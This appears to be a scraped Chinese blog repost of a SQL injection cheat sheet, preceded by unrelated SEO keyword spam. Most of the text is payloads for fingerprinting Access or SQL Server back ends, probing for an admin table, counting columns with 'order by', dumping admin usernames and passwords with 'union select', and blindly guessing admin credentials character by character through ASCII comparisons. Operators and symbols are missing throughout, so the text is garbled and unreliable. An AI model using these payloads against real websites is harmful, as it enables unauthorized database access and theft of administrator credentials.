免费网站建设自助建站,中国外贸人才网官网,软件工程师证怎样考取,建筑设计公司职位有哪些and exists(select from msysobjects) 0 判断是否为access数据库and exists(select from sysobjects) 0 判断是否为sql server数据库 and exists(select from admin) 查看是否存在admin表 代表所有#xff0c;可修改字段名order by 数值 判断字段长度,正常则证明字…and exists(select from msysobjects) 0 判断是否为access数据库and exists(select from sysobjects) 0 判断是否为sql server数据库 and exists(select from admin) 查看是否存在admin表 代表所有可修改字段名order by 数值 判断字段长度,正常则证明字段名长度在数值范围内报错则超出范围union select 1-正确数值 from 表名 联合查询查询出两个数值union select 上面第一个正确数值第二个正确数值 from 表名 爆出账号密码and(select len(admin)from admin) 5 正常说明管理员账户长度为5 and(select top 1 asc(mid(admin,1,1))from admin)100 猜解管理员账号的第一个数据通过判 断ascii码判断返回正常则大于反之则小于mid(admin,2,1) 找第二列依次类推转载于:https://blog.51cto.com/3945465/2138972